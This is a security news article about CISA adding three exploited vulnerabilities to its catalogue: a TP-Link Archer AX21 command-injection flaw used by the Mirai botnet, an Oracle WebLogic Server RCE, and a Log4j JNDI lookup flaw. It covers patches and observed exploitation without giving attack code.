Mirai Botnet Loves Exploiting Your Unpatched TP-Link Routers

The US government’s Cybersecurity and Infrastructure Security Agency (CISA) is adding three more flaws to its list of known-exploited vulnerabilities, including one involving TP-Link routers that is being targeted by the operators of the notorious Mirai botnet.

The other two placed on the list this week involve versions of Oracle’s WebLogic Server software and the Apache Foundation’s Log4j Java logging library.

The command-injection flaw in TP-Link’s Archer AX21 Wi-Fi 6 routers – tracked as CVE-2023-1389 – lurks in device firmware prior to version 1.1.4 Build 20230219, which addresses the issue. An unauthorized attacker can exploit this hole to inject commands that could lead to remote code execution (RCE), enabling the intruder to take control of the device from across the network or internet.

Trend Micro’s Zero Day Initiative (ZDI) threat-hunting group early last week wrote in a report that in mid-April miscreants behind the please-can’t-it-just-die Mirai botnet were beginning to exploit the flaw primarily by attacking devices in Eastern Europe, though the campaign soon expanded beyond that region.

The Mirai malware rolls up infected Linux-based Internet of Things (IoT) devices into a botnet that can then be remotely controlled to perform large-scale network attacks, including distributed denial-of-services (DDoS) assaults.

The command-injection vulnerability was found by several teams participating in ZDI’s Pwn2Own Toronto contest last year and as we said, TP-Link has since issued firmware to fix the issue. After hearing from ZDI that the Mirai botnet operators were trying to exploit it, TP-Link issued a statement urging users to install the updated firmware.

For devices linked to a TP-Link Cloud account, the firmware was updated automatically. Other users need to update the routers themselves.

The ZDI researchers wrote that seeing the flaw being exploited so quickly after the patch was released is another example of the decreasing time between a vulnerability being found and exploitation attempts beginning.

“That said, this is nothing new for the maintainers of the Mirai botnet, who are known for quickly exploiting IoT devices to maintain their foothold in the enterprise,” they wrote.

Oracle, meanwhile, patched the CISA-highlighted vulnerability in its WebLogic Server software in January. The flaw, found in versions 12.2.1.2.0, 12.2.1.4.0, and 12.1.1.0.0 of WebLogic Server and tracked as CVE-2023-21839, is easily exploitable and could allow an unauthenticated attacker who has network access through T3 or IIOP protocols to compromise the server and gain access to data on the system.

There doesn’t appear to be active exploitation attempts of the RCE flaw over the past 30 days, according to GreyNoise, which collects and analyzes data from the internet. However, what helps make it such a threat is that no user interaction or authentication needs to happen for the intruder to be able to grab control of a server.

In its patch update notice in January, Oracle gave a nod to several security researchers for alerting the database giant of the vulnerability.

We wish Log4j would jog on

The Apache flaw, tracked as CVE-2021-45046, involves the Log4j Java library, but is not the Log4j RCE vulnerability (dubbed Log4Shell and published as CVE-2021-44228) that was found around the same time that became such a threat to enterprises because of its ubiquitous use in commercial and consumer services, products, websites, and applications worldwide.

The Log4j vulnerability cited this week by CISA also is an RCE flaw. According to the Apache Software Foundation and CISA, a fix to address the Log4Shell vulnerability in Log4j 2.15.0 didn’t cover certain logging configurations that use a non-default Pattern Layout with a Context Lookup. Because of this, attackers who controlled the Thread Context Map (MDC) input data could create malicious input data using a JNDI Lookup pattern.

That could lead to an RCE and information leak in some instances and local code execution in all environments. Log4j 2.16.0 (in Java 8) and 2.12.1 (Java 7) fix the issue by disabling JNDI by default and removing support for message lookup patterns.

In December 2021 CISA, the FBI, and security agencies in such countries as Australia, Canada, and the UK warned that miscreants were actively exploiting both Log4j vulnerabilities. GreyNoise found indications that both holes were being targeted over the past 30 days by as many as 74 unique IPs, though it’s unknown how many were related to CVE-2021-45046. ®

READ MORE HERE